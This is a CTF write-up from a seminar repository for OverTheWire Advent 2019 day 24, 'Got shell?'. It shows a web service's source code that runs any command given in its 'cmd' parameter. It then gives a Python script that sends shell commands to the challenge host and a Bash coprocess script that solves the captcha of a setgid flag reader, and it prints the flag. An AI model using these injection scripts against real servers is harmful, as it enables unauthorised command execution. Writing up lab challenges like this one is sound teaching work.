Add write-up for OTW day-25: Lost in Maze

[pub/jan/ctf-seminar.git] / writeups / litplus / otw19 / Adv-24.md

day-24 Got shell?
-----------------
OverTheWire Advent 2019, day 24

Discussion in [Mattermost](https://mattermost.w0y.at/otw-advent-2019/channels/day-24-got-shell)

Time spent for this challenge: 2.25 hours + 0.5 hours write-up

 * December 24: 2.25 hours (13:30-15:45)

### Overview

```
Got shell? - web, linux
Points: 1337

Can you get a shell? NOTE: The firewall does not allow outgoing traffic & There are no additional paths on the website.
Service: http://3.93.128.89:1224
Author: semchapeu
```

Accessing the website shows some C++ code:

```
#include "crow_all.h"
#include <cstdio>
#include <iostream>
#include <memory>
#include <stdexcept>
#include <string>
#include <array>
#include <sstream>

std::string exec(const char* cmd) {
    std::array<char, 128> buffer;
    std::string result;
    std::unique_ptr<FILE, decltype(&pclose)> pipe(popen(cmd, "r"), pclose);
    if (!pipe) {
        return std::string("Error");
    }
    while (fgets(buffer.data(), buffer.size(), pipe.get()) != nullptr) {
        result += buffer.data();
    }
    return result;
}

int main() {
    crow::SimpleApp app;
    app.loglevel(crow::LogLevel::Warning);

    CROW_ROUTE(app, "/")
    ([](const crow::request& req) {
        std::ostringstream os;
        if(req.url_params.get("cmd") != nullptr){
            os << exec(req.url_params.get("cmd"));
        } else {
            os << exec("cat ./source.html"); 
        }
        return crow::response{os.str()};
    });

    app.port(1224).multithreaded().run();
}
```

From this, we see that the app uses the [CROW](https://github.com/ipkn/crow) framework for web handling, which is inspired by Python's Flask. From the code, we see that, normally, the website prints the source code. However, if the `cmd` query parameter is provided, it runs this command directly without validation.

### Exploitation
Passing `ls -hla` reveals:

```
total 44K
drwxr-xr-x 1 root root     4.0K Dec 24 11:56 .
drwxr-xr-x 1 root root     4.0K Dec 24 11:56 ..
----r----- 1 root gotshell   38 Dec 24 08:32 flag
------s--x 1 root gotshell  18K Dec  5 17:26 flag_reader
-rw-rw-r-- 1 root root      11K Dec 24 08:32 source.html
```

So, the `flag_reader` binary can access the flag, but we cannot do that directly.

To make command execution easier, I developed a small Python script:

```
#!/usr/bin/env python3
import sys
import requests

while True:
    print(" > ", end="", flush=True)
    command=input()
    print(" ... ", end="\r", flush=True)
    payload = { 'cmd': command }
    req = requests.get("http://3.93.128.89:1224/", params=payload, timeout=2)
    print(req.text)
```

Some information:

```
 > id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 > ./flag_reader
Got shell?
1411293829 + 1732747376 = Incorrect captcha :(
 > uname -a
Linux d2474e4d718f 4.15.0-1051-aws #53-Ubuntu SMP Wed Sep 18 13:35:53 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
```

The challenge here is that `flag_reader` generates the captcha dynamically and only prints the flag if the response is correct -- However, we do not have access to STDIN. Python is not present on the host. `@stiefel40k` tried to write a Perl script, while I took a go at a Bash script to achieve the same.

I started by using [awk](https://www.gnu.org/software/gawk/manual/html_node/Arithmetic-Ops.html) to do the arithmetic operation, thinking that this would be easy. Quickly, I had a payload:

```
./flag_reader | tail -n 1 | awk '{ sum = $1 + $3 ; \n print sum }'
```

However, this just prints to STDOUT, we need to pass it to a program earlier in the pipe.

In the meantime, `@stiefel40k` had developed a local simulation of the flag reader:

```
#!/bin/bash

R1=$(echo $RANDOM)
R2=$(echo $RANDOM)

echo "Got a shell?"
echo -n "$R1 + $R2 = "
read VAL
SUM=$(($R1+$R2))

if [[ $SUM -ne $VAL ]]
then
  echo "Wrong"
  exit 1
else
  echo "Yes"
fi
```

To be able to dynamically write to the flag reader depending on its output, I used [a little-known feature of Bash](https://www.gnu.org/software/bash/manual/html_node/Coprocesses.html), coprocesses. These StackOverflow questions helped with this: [1](https://stackoverflow.com/questions/5129276/how-to-redirect-stdout-of-2nd-process-back-to-stdin-of-1st-process), [2](https://stackoverflow.com/questions/7689100/bash-coproc-unexpected-behavior).

```
#!/bin/bash
coproc p1 {
  ./flag_reader
}

#awk '{ sum = $1 + $3 ;
#  print sum }' <&${p1[0]} >&${p1[1]}
read line <&${p1[0]}
    echo " -> $line <-"

read -d "=" captcha <&${p1[0]}
solution=$(echo $captcha | awk '{ sum = $1 + $3 ;
  print sum }')
echo "hey solute $solution"
echo "$solution" >&${p1[1]}

echo "hi"
tee <&${p1[0]}
```

This worked locally, but not on the server. I wasn't sure why, but the server had some difficulties, so I added retry logic to the exploit script. Also, I saved the script to `proc.sh` to make it easier to edit and handle:

```
import sys
import requests
import requests.exceptions

script=""

while True:
    print(" > ", end="", flush=True)
    command=input()
    worked=False
    while not worked:
        try:
            if command == "EXPL":
                with open("proc.sh", "r") as file:
                    script = "".join(file.readlines())
                command=script
            escaped = command.replace("\n", " ").replace('"', '\\"').replace("$", "\\$")
            full = 'bash -c "'+escaped+'"'#+' ; echo \\"result -> $?\\""'
            payload = { 'cmd': full}
            print(full)
            print(" ... ", end="\r", flush=True)
            req = requests.get("http://3.93.128.89:1224/", params=payload, timeout=20)
            print("     ", end="\r", flush=True)
            print(req.text)
            print("(done)")
            worked=True
        except requests.exceptions.ReadTimeout:
            print("(timed out)")
        except requests.exceptions.ConnectionError:
            print("(connect error)")
```

What this does is wrap the command in `bash -c`, which is necessary because coprocesses are a Bash-specific feature. It also does some escaping on the script, because it needs to be passed quoted to the shell. Doing this in the file directly was not feasible because I needed to run it locally as well.

Ultimately, the reason why it did not work was that the co-process syntax I used was not supported on the version of Bash the remote used. (Yay Ubuntu! -- Note the semicolon after the block) Also, `awk` by default outputs large numbers in scientific notation, which the flag reader did not accept:

```
HELLO
 -> Got shell? <-
hey solute 3.43413e+09
hi
 Incorrect captcha :(
```

The final Bash script is as follows (`25-proc.sh`): (missing shebang is important because it is combined into a single line)

```
echo "HELLO";
coproc p1 {
./flag_reader;
};
read line <&${p1[0]};
echo " -> $line <-";
read -d "=" captcha <&${p1[0]};
solution=$(echo $captcha | timeout 1s awk '{ sum = $1 + $3 ;
  printf "%.0f", sum }');
echo "hey solute $solution";
echo "$solution" >&${p1[1]};
echo "hi";
cat <&${p1[0]}
```

Combined with the Python script from above (`25-shell.py`), this yielded the flag: `AOTW{d1d_y0u_g3t_4n_1n73r4c71v3_5h3ll}`.

---